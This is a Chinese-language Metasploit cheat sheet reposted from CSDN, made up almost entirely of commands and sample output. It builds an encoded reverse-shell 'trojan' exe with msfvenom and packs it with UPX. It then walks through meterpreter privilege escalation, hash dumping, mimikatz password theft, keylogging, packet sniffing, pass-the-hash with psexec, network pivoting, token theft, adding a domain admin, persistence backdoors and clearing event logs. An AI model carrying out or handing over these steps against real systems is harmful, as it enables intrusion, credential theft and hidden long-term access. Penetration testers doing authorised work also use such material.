转载自
csdn:忆蓉之心
简介
它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
环境
工具:msf4
伪装木马
原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
构造shellcode常用命令
-
msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0b\x27\x36\xce\xc1\x42\xa9\x0d" -f c -
msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0b\x27\x36\xce\xc1\x42\xa9\x0d" -f python
常用命令
查看帮助
msfvenom -h
查看一个Payload具体需要什么参数?
msfvenom -p windows/meterpreter/bind_tcp --payload-options
自己本地生成的bind_tcp的payload并不能在Windows机子上运行 (提示不是可用的Win32程序;如果大家也有遇到这种错误的话,推荐用msfvenom生成c的shellcode 然后自己编译为exe后运行。使用msfvenom –list可以查看所有的payload encoder nops。
设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.152,端口设置成443.所以最后连接会通向192.168.1.152的443端口。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.152 LPORT=443 -f exe > c.exe
参数说明:
-
-p payload -
-e 编码方式 -
-i 编码次数 -
-b 在生成的程序中避免出现的值 -
LHOST,LPORT 监听上线的主机IP和端口 -
-f exe 生成EXE格式
upx加壳
说明:upx只是压缩壳工具;如果需要增大破解难度,需要添加加密壳。
upx -9 c.exe
本机监听
因为之前用的是reverse_tcp,所以设置如下:
-
msf > use exploit/multi/handler -
msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
验证
基本命令
-
background # 让meterpreter处于后台模式 -
sessions -i number # 与会话进行交互,number表示第n个session -
quit # 退出会话 -
shell # 获得命令行 -
cat c:\\boot.ini # 查看文件内容 -
getwd # 查看当前工作目录 work directory -
upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上 -
download 0xfa.txt /root/Desktop/ # 下载文件到本机上 -
edit c:\\boot.ini # 编辑文件 -
search -d d:\\www -f web.config # search 文件 -
ps # 查看当前活跃进程 -
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中 -
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 -
getpid # 获取当前进程的pid -
kill pid # 杀死进程 -
getuid # 查看权限 -
sysinfo # 查看目标机系统信息,如机器名,操作系统等 -
getsystem #提权操作 -
timestompc:/a.doc -c "10/27/2015 14:22:11" #修改文件的创建时间
迁移进程
-
meterpreter > ps -
自行选择PID -
meterpreter > migrate pid
提权操作
-
getsystem 大部分都会失败 他只尝试了4个Payload。 -
meterpreter > getuid -
Server username: Testing\Croxy -
meterpreter > getsystem -
[-] priv_elevate_getsystem: Operation failed: Access is denied. -
使用MS14-058之类的Exp进行提权 -
meterpreter > background -
[*] Backgrounding session 3.. -
msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu -
msf exploit(ms14_058_track_popup_menu) > set SESSION 3
获取敏感信息
-
run post/windows/gather/checkvm #是否虚拟机 -
run post/windows/gather/enum_applications #获取安装软件信息 -
run post/windows/gather/dumplinks #获取最近的文件操作 -
run post/windows/gather/enum_ie #获取IE缓存 -
run post/windows/gather/enum_chrome #获取Chrome缓存 -
run scraper #获取常见信息 -
#保存在~/.msf4/logs/scripts/scraper/目录下
键盘记录
-
meterpreter > keyscan_start -
Starting the keystroke sniffer... -
meterpreter > keyscan_dump -
Dumping captured keystrokes... -
dir <Return> cd <Ctrl> <LCtrl> -
meterpreter > keyscan_stop -
Stopping the keystroke sniffer...
网络嗅探
-
meterpreter > use sniffer -
Loading extension sniffer...success. -
meterpreter > sniffer_interfaces -
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false ) -
2 - 'Intel(R) PRO/1000 MT Desktop Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) -
3 - 'Cisco Systems VPN Adapter' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false ) -
meterpreter > sniffer_start 2 -
[*] Capture started on interface 2 (50000 packet buffer) -
meterpreter > sniffer_dump 2 /tmp/test2.cap -
[*] Flushing packet capture buffer for interface 2... -
[*] Flushed 1176 packets (443692 bytes) -
[*] Downloaded 100% (443692/443692)... -
[*] Download completed, converting to PCAP... -
[*] PCAP file written to /tmp/test2.cap
获取hash
-
meterpreter > run post/windows/gather/smart_hashdump -
[*] Running module against TESTING -
[*] Hashes will be saved to the database if one is connected. -
[*] Hashes will be saved in loot in JtR password file format to: -
[*] /home/croxy/.msf4/loot/20150929225044_default_10.0.2.15_windows.hashes_407551.txt -
[*] Dumping password hashes... -
[*] Running as SYSTEM extracting hashes from registry -
[*] Obtaining the boot key... -
[*] Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239... -
[*] Obtaining the user list and keys... -
[*] Decrypting user keys... -
[*] Dumping password hints... -
[+] Croxy:"Whoareyou" -
[*] Dumping password hashes... -
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: -
[+] HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0::: -
[+] test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::
获取明文密码
-
meterpreter > getuid -
Server username: NT AUTHORITY\SYSTEM -
meterpreter > load mimikatz -
Loading extension mimikatz...success. -
meterpreter > msv -
[+] Running as SYSTEM -
[*] Retrieving msv credentials -
meterpreter > kerberos -
[+] Running as SYSTEM -
[*] Retrieving kerberos credentials -
kerberos credentials -
==================== -
meterpreter > mimikatz_command -f samdump::hashes -
Ordinateur : Testing -
BootKey : 8c2c8d96e92a8ccfc407a1ca48531239 -
meterpreter > mimikatz_command -f sekurlsa::searchPasswords -
[0] { Croxy ; Testing ; hehe } -
[1] { test ; Testing ; test }
通过hash获取权限
-
msf > use exploit/windows/smb/psexec -
msf exploit(psexec) > show options -
Module options (exploit/windows/smb/psexec): -
Name Current Setting Required Description -
---- --------------- -------- ----------- -
RHOST yes The target address -
RPORT 445 yes Set the SMB service port -
SHARE ADMIN$ yes The share to connect to, can be an admi n share -
(ADMIN$,C$,...) or a normal read/write folder share -
SMBDomain WORKGROUP no The Windows domain to use for authentic ation -
SMBPass no The password for the specified username -
SMBUser no The username to authenticate as -
Exploit target: -
Id Name -
-- ---- -
0 Automatic -
msf exploit(psexec) > set RHOST 192.168.0.254 -
RHOST => 192.168.0.254 -
msf exploit(psexec) > set SMBUser isosky -
SMBUser => isosky -
msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -
SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -
msf exploit(psexec) > exploit -
[*] Started reverse handler on 192.168.0.3:4444 -
[*] Connecting to the server... -
[*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'... -
[*] Uploading payload... -
[*] Created \UGdecsam.exe... -
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ... -
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ... -
[*] Obtaining a service manager handle... -
[*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")... -
[*] Closing service handle... -
[*] Opening service... -
[*] Starting the service... -
[*] Removing the service... -
[*] Closing service handle... -
[*] Deleting \UGdecsam.exe... -
[*] Sending stage (749056 bytes) to 192.168.0.254 -
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877)
内网渗透
端口转发 (将远程主机3389端口转发到本地1234端口上)
-
meterpreter > portfwd add -l 1234 -p 3389 -r 10.42.0.54 -
[*] Local TCP relay created: 0.0.0.0:8081 <-> 10.42.0.54:80
内网代理
-
meterpreter > run autoroute -s 10.42.0`.54 -
[*] Adding a route to 10.42.0.54/255.255.255.0... -
[+] Added route to 10.42.0.54/255.255.255.0 via 10.42.0.54 -
[*] Use the -p option to list all active routes -
meterpreter > background -
[*] Backgrounding session 1... -
msf exploit(handler) > use auxiliary/server/socks4a -
msf auxiliary(socks4a) > show options -
Module options (auxiliary/server/socks4a): -
Name Current Setting Required Description -
---- --------------- -------- ----------- -
SRVHOST 0.0.0.0 yes The address to listen on -
SRVPORT 1080 yes The port to listen on. -
Auxiliary action: -
Name Description -
---- ----------- -
Proxy -
msf auxiliary(socks4a) > route print -
Active Routing Table -
==================== -
Subnet Netmask Gateway -
------ ------- ------- -
10.42.0.54 255.255.255.0 Session 1 -
msf auxiliary(socks4a) > ifconfig -
[*] exec: ifconfig -
msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xx -
SRVHOST => xxx.xxx.xx.xx (xxx.xxx.xx.xx为自己运行msf的vps机子) -
msf auxiliary(socks4a) > exploit -
[*] Auxiliary module execution completed -
[*] Starting the socks4a proxy server
之后使用proxychains 设置socks4代理 链接vps上的1080端口 就可以访问内网了。
SSH代理
-
msf > load meta_ssh -
msf > use multi/ssh/login_password -
msf > set RHOST 192.168.56.3 -
RHOST => 192.168.56.3 -
msf > set USER test -
USER => test -
msf > set PASS reverse -
PASS => reverse -
msf > set PAYLOAD ssh/metassh_session -
PAYLOAD => ssh/metassh_session -
msf > exploit -z -
[*] Connecting to [email protected]:22 with password reverse -
[*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28 03:51:16 +1300 -
[*] Session 1 created in the background. -
msf > route add 192.168.57.0 255.255.255.0 1
之后就是愉快的内网扫描了。
当然还是推荐直接用ssh -f -N -D 127.0.0.1:6666 [email protected]
偷取token
-
meterpreter>ps #查看目标机器进程,找出域控账户运行的进程ID -
meterpreter>steal_token pid -
meterpreter > getuid -
Server username: NT AUTHORITY\SYSTEM -
meterpreter > load incognito -
Loading extension incognito...success. -
meterpreter > list_tokens -u -
Delegation Tokens Available -
======================================== -
IIS APPPOOL\zyk -
NT AUTHORITY\IUSR -
NT AUTHORITY\LOCAL SERVICE -
NT AUTHORITY\NETWORK SERVICE -
NT AUTHORITY\SYSTEM -
QLWEB\Administrator -
Impersonation Tokens Available -
======================================== -
NT AUTHORITY\ANONYMOUS LOGON -
meterpreter > impersonate_token QLWEB\\Administrator -
[+] Delegation token available -
[+] Successfully impersonated user QLWEB\Administrator -
meterpreter > getuid -
Server username: QLWEB\Administrator -
meterpreter>add_user 0xfa funny –h192.168.3.98 #在域控主机上添加账户 -
meterpreter>add_group_user “DomainAdmins” 0xfa –h192.168.3.98 #将账户添加至域管理员组
内网扫描
-
meterpreter > run autoroute -s 192.168.3.98 -
meterpreter > background -
[*] Backgrounding session 2... -
msf exploit(handler) > use auxiliary/scanner/portscan/tcp -
msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306 -
PORTS => 80,8080,21,22,3389,445,1433,3306 -
msf auxiliary(tcp) > set RHOSTS 192.168.3.1/24 -
RHOSTS => 192.168.3.1/24 -
msf auxiliary(tcp) > set THERADS 10 -
THERADS => 10 -
msf auxiliary(tcp) > exploit
后门
一个vbs后门,写入了开机启动项;但是容易被发现,还是需要大家发挥自己的智慧。
-
meterpreter > run persistence -X -i 5 -p 23333 -r 10.42.0.1 -
[*] Running Persistance Script -
[*] Resource file for cleanup created at /home/croxy/.msf4/logs/persistence/TESTING_20150930.3914/TESTING_20150930.3914.rc -
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=23333 -
[*] Persistent agent script is 148453 bytes long -
[+] Persistent Script written to C:\Users\Croxy\AppData\Local\Temp\ulZpjVBN.vbs -
[*] Executing script C:\Users\Croxy\AppData\Local\Temp\ulZpjVBN.vbs -
[+] Agent executed with PID 4140 -
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\okiASNRzcLenulr -
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\okiASNRzcLenulr -
Meterpreter服务后门 -
meterpreter > run metsvc -
[*] Creating a meterpreter service on port 31337 -
[*] Creating a temporary installation directory C:\Users\Croxy\AppData\Local\Temp\tuIKWqmuO... -
[*] >> Uploading metsrv.x86.dll... -
[*] >> Uploading metsvc-server.exe... -
[*] >> Uploading metsvc.exe... -
[*] Starting the service... -
* Installing service metsvc -
* Starting service -
* Service metsvc successfully installed.
之后电脑就默默生成了一个自启服务meterpreter;然后连接后门。
-
msf exploit(handler) > use exploit/multi/handler -
msf exploit(handler) > set payload windows/metsvc_bind_tcp -
payload => windows/metsvc_bind_tcp -
msf exploit(handler) > set RHOST 10.42.0.54 -
RHOST => 10.42.0.54 -
msf exploit(handler) > set LPORT 31337 -
LPORT => 31337 -
msf exploit(handler) > exploit
清理痕迹
-
meterpreter > clearev -
[*] Wiping 12348 records from Application... -
[*] Wiping 1345 records from System... -
[*] Wiping 3 records from Security... -
meterpreter > timestomp
一些常用的破解模块
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/ftp/anonymous
一些好用的模块
auxiliary/admin/realvnc_41_bypass (Bypass VNCV4网上也有利用工具)
auxiliary/admin/cisco/cisco_secure_acs_bypass (cisco Bypass 版本5.1或者未打补丁5.2版 洞略老)
auxiliary/admin/http/jboss_deploymentfilerepository (内网遇到Jboss最爱:))
auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令执行:)
auxiliary/admin/mssql/mssql_exec (用爆破得到的sa弱口令进行执行命令 没回显:()
auxiliary/scanner/http/jboss_vulnscan (Jboss 内网渗透的好朋友)
auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令执行sql语句:)
auxiliary/admin/oracle/post_exploitation/win32exec (爆破得到Oracle弱口令来Win32命令执行)
auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用户来执行sql语句)
一些好用的脚本
uxiliary/scanner/rsync/modules_list (Rsync)
auxiliary/scanner/misc/redis_server (Redis)
auxiliary/scanner/ssl/openssl_heartbleed (心脏滴血)
auxiliary/scanner/mongodb/mongodb_login (Mongodb)
auxiliary/scanner/elasticsearch/indices_enum (elasticsearch)
auxiliary/scanner/http/axis_local_file_include (axis本地文件包含)
auxiliary/scanner/http/http_put (http Put)
auxiliary/scanner/http/gitlab_user_enum (获取内网gitlab用户)
auxiliary/scanner/http/jenkins_enum (获取内网jenkins用户)
auxiliary/scanner/http/svn_scanner (svn Hunter)
auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破)
auxiliary/scanner/http/zabbix_login (Zabbix )